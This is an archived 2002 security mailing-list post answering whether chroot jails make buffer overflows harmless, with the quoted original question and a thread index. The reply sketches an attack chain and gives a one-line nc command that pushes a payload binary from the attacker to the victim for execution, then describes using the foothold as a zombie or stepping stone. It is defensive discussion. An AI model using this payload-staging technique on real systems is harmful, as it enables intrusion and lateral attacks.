Vulnerability Development mailing list archives
Re: OT? Are chroots immune to buffer overflows?
From: "Adam Lydick" <lydickaw () hotmail com>
Date: Wed, 22 May 2002 13:26:44 -0400
Sure it can. Just have the bootstrap code (the overflow) download a binary from the attacker's machine:
'nc victim_machine portnum < evilcode'Then exec the code. All the calls you need are in libc, which is almost certainly loaded by the overflowed program. You have a chrooted, local account that can still be used as a zombie for attacks or masking your true location... (Or as a stepping stone for attacking more powerful accounts / machines on the local network)
Adam
From: Jason Haar <Jason.Haar () trimble co nz> To: vuln-dev () securityfocus com Subject: OT? Are chroots immune to buffer overflows? Date: Wed, 22 May 2002 15:48:16 +1200 [note: my question is WRT non-root chrooted jails - we all know about chroot'ing root processes!] Most buffer overflows I've seen attempt to infiltrate the system enough torun /bin/sh. In chroot'ed environments, /bin/sh doesn't (shouldn't!) exist -so they fail. Is it as simple as that? As 99.999% of the system binaries aren't available in the jail, can a buffer overflow ever work? -- Cheers Jason Haar Information Security Manager Trimble Navigation Ltd. Phone: +64 3 9635 377 Fax: +64 3 9635 417
_________________________________________________________________ Chat with friends online, try MSN Messenger: http://messenger.msn.com
Current thread:
- Re: OT? Are chroots immune to buffer overflows?, (continued)
- Re: OT? Are chroots immune to buffer overflows? Greg Hunt (May 23)
- Re: OT? Are chroots immune to buffer overflows? Birger Toedtmann (May 22)
- Re: OT? Are chroots immune to buffer overflows? sd (May 22)
- Re: OT? Are chroots immune to buffer overflows? Andreas Ferber (May 22)
- Re: OT? Are chroots immune to buffer overflows? jove (May 23)
- Re: OT? Are chroots immune to buffer overflows? Dave Ahmad (May 23)
- Message not available
- Re: OT? Are chroots immune to buffer overflows? Jason Haar (May 23)
- Re: OT? Are chroots immune to buffer overflows? dev-null (May 22)
- RE: OT? Are chroots immune to buffer overflows? Stuart Adamson (May 22)
- RE: OT? Are chroots immune to buffer overflows? Steve Bremer (May 23)
- Re: OT? Are chroots immune to buffer overflows? Adam Lydick (May 23)
- Re: OT? Are chroots immune to buffer overflows? Iván (May 23)
- Re: OT? Are chroots immune to buffer overflows? Steve Bremer (May 24)
- RE: OT? Are chroots immune to buffer overflows? Stuart Adamson (May 24)
- Re: OT? Are chroots immune to buffer overflows? Hank Leininger (May 28)
- Re: OT? Are chroots immune to buffer overflows? Jose Nazario (May 28)